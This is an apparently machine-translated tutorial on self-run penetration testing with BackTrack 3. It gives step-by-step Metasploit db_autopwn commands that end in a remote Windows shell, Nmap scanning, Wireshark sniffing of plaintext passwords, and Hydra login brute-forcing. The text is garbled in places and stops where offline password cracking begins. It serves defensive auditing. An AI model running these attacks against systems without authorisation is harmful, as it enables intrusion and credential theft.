Perform security auditing by yourself when a white hat hacker

Huang yongbing

It is important to ensure the security of servers, PCs, and laptops in your organization. Once the security environment is damaged, important data stored on these devices may be damaged or modified, which may lead to loss of customer confidence and sales orders. Is the enterprise network you are managing really secure? Are you sure you want to answer? If you are not sure about the answer, why not take a security audit? Use the facts.

A complete security audit is often inadequate for an enterprise. It may be that the price of a security company is too high, or that the final security audit report is too wet, in this article, we want to use open-source software for a thorough security audit from several aspects. We cannot guarantee that every audit is performed, at least better than when we ask questions.

Existing protection measures

Before starting the audit, you should first find out the security protection measures of your network environment. Generally, small and medium enterprises will have:

(1) A firewall that isolates the internal network of an enterprise from the Internet.
(2) An Intrusion Prevention System (IPS)/intrusion Monitoring System (IDS) that automatically generates alarms when detecting attacks.
(3) A set of malware scanning programs to scan malware on the network.
(4) Verify the password used for access to networks and computers to prevent direct access without a password.
(5) A set of anti-virus software or a stand-alone version of anti-virus software to ensure the detection and removal of popular viruses.

Maybe there may not be so many security measures in your network, so you should perform a security audit. Even with these protection measures, there may be security risks, such:

(1) The firewall has discovered the vulnerability, but you have not promptly installed the patch.
(2) Improper configuration of IPS/IDS does not play a role or cause negative impact.
(3) passwords that protect network and computer resources are very weak, such as 123456.
(4) anti-virus software has not been upgraded for a long time and cannot be sensed by the latest virus.
(5) other vulnerabilities that you have not discovered may exist in your IT architecture.

Penetration Test

Let's start with penetration testing. We can see whether the existing security protection measures can actually protect the entire network. In fact, penetration testing is to treat itself as a hacker, some hacker attack methods are used to initiate simulated attack tests on the network.

Penetration Testing usually involves several steps:

(1) Information Collection

Use search engines and other resources to discover as many company information as possible, such as company name and employee name.

(2) Port Scanning

Use an automatic port scanner to find active computers and running services in the network. It is best to find services with vulnerabilities.

(3) Investigation

Detects various information on the target server, such as running programs and background services.

(4) network sniffing

The user name and password transmitted over the network are found.

(5) password attacks

Crack the password or guess the password.

Because protection of networks and attack networks are two different fields, the penetration test must be switched to hacker thinking. The best penetration test is to hire a security expert, but this usually requires a fee. Of course, for cost consideration, you can choose penetration testing software, which searches for vulnerabilities in the network and can automatically launch simulated attacks in some cases. When using software for penetration testing, you can perform a test every month or even every week.

After talking about this, how can we perform penetration testing? First, you need to prepare a laptop that can be connected to a wireless network or a wired network. Then we will test the software. Most of the software described in this article is open-source and can be run in Linux. The simplest way is to download a LiveCD, this article uses a Secure Linux release of BackTrack, you can goWww.remote-exploit.orgDownload. The steps for creating LiveCD are not described. This release contains many penetration testing tools. The following are some examples:

Use db_autopwn for penetration testing

Db_autopwn is an automatic penetration test tool that can test Windows, Linux, and Unix computer vulnerabilities on the network. It is actually part of Metaspoit Framework software.

Before using db_autopwn, you must first scan the computer on the network to use the well-known Nmap. Using the information obtained from the scan, db_autopwn will use the Metaspoit attack library features to match known vulnerabilities, and automatically use the corresponding attack program to initiate the attack. If the attack succeeds, "pwn" will be displayed, and a system shell will be obtained at this time.

Db_autopwn has many advantages. It is a widely used tool in the hacking industry and is free of charge. after discovering a vulnerability, you can take the right remedy and patch it in time, then perform the test. However, you should also note that if the service is not running on the default port, it cannot detect the vulnerability, or it may cause an accident, such as server crash.

The specific steps are as follows:

# Cd/pentest/exploits/framework3 (go to The Metasploit Framework folder)
#./Msfconsole (start Metasploit)
# Load db_sqlite3
# Db_create Nmapresults (create database storage scan results)
# Db_Nmap [target] (scan the target host and replace [target] with the actual IP address of the target host)
# Db_autopwn-t-p-e (try to attack services on the default port)
# Sessions-l (view computers with vulnerabilities)
# Sessions-I 1 (controls computers with vulnerabilities. Here, 1 indicates only one computer is controlled)

Then a command line interface is returned, such:
[*] Starting interaction with 1...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C: WINDOWSsystem32>

Use Nmap to scan the network

Db_autopwn is usually used by people who have no technical skills. We generally call it "script kiddies", while other methods are actually being used in addition to a method.

Attackers often scan the target network to see which computers are connected to the network and which ports are opened. Generally, the tool they use is Nmap. In fact, db_autopwn has been used before, nmap itself is a command line tool, but it has been integrated with a graphical Nmap tool in BackTrack3, I .e. Zenmap.

In the BackTrack3 taskbar, enter zenamp to start Zenamp, and then enter the IP address or IP subnet range of the target system at the destination address, such as 192.168.1. * Then select a preset scan option to retain the default scan intensity. Then, click the scan button to start scanning. In a few minutes, the scan result will be displayed.

The list on the left of the page shows the hosts connected to the network, and different icons are used to indicate different operating system types. The list on the right shows the ports opened by the selected host and the corresponding services, if you see port 3389 open, most of them are a Windows operating system. Terminal Services are open, and a complete set of attack programs are available for these open ports.

Wireshark sniffing network

Nmap can scan for a clear host list and open ports, but it cannot provide packet content and sensitive information transmitted over the network, in this case, we need to find out Wireshark, which is also a well-known Wireshark. In the past, it was named Ethereal. It was an open-source network protocol analyzer. The popular point is network sniffer.

Before using Wireshark to start sniffing, you must first select the network location of the test machine, because the switch will only send data to the port connected to the target host, if the location is not found, it may be impossible for half a day for sniffing. So before you start, familiarize yourself with and analyze your network conditions and hardware configurations. Note that some hubs work in the same way as switches, so don't think that you can start sniffing if you connect to a Hub.

To make the test smooth and feasible, you 'd better deploy a switch with a monitoring port on the network, because the monitoring port will capture all packets passing through the switch. Hackers like Wireshark because it can sniff the user name and plaintext password. Many prefer to set the password to the same as the user name, or use the same user name when logging on to multiple systems, in this way, hackers are given the opportunity. Wireshark can sniff most network applications, including MSN communication content.

The following is a pop communication content I have captured. the user name and password are in plain text. Well, you know what to do next.

498) this. style. width = 498; "border = 0>

Figure 1

Use Hydra to check password security

Hackers have many ways to get the email user name, such as searching, getting it from your enterprise website, or calling you directly to ask about the development of the times, few people use the user name as the password, but some people are still doing this.

Hydra is a tool used to check password security.

The procedure in BackTrack 3 is as follows:

(1) In the startup command input box of BackTrack 3, enter Hydra of the xhydra startup graphic interface.
(2) Select a protocol from the protocol list. It supports many protocols, such as pop3, telnet, ftp, VNC, smtp, and cisco auth.
(3) Select a target host or enter an IP address.
(4) switch to the password tab and enter a known user name in the user name input box. If you do not know, you can define a user name dictionary file in advance to guess, but I do not recommend that you do this, unless you have more time. Then, enter the password you guessed in the password input box, which is generally used for weak password monitoring. Generally, you can use the password dictionary to check the password. In the password list input box, specify the location of the password dictionary file.
(5) switch to the "adjust" tab and select the number of logon attempts. Note that you should not set the number of logon attempts to be greater than 5, because many systems have set the number of logon attempts to be locked if they fail to log on more than 5 times.
(6) switch to the start tab and click Start attack. If the attack succeeds, a successful message is displayed, and the password is included in the message.

Use Offline Attacks to detect weak passwords

After a user logs on to the server and enters the password, the password is passed to a hash function.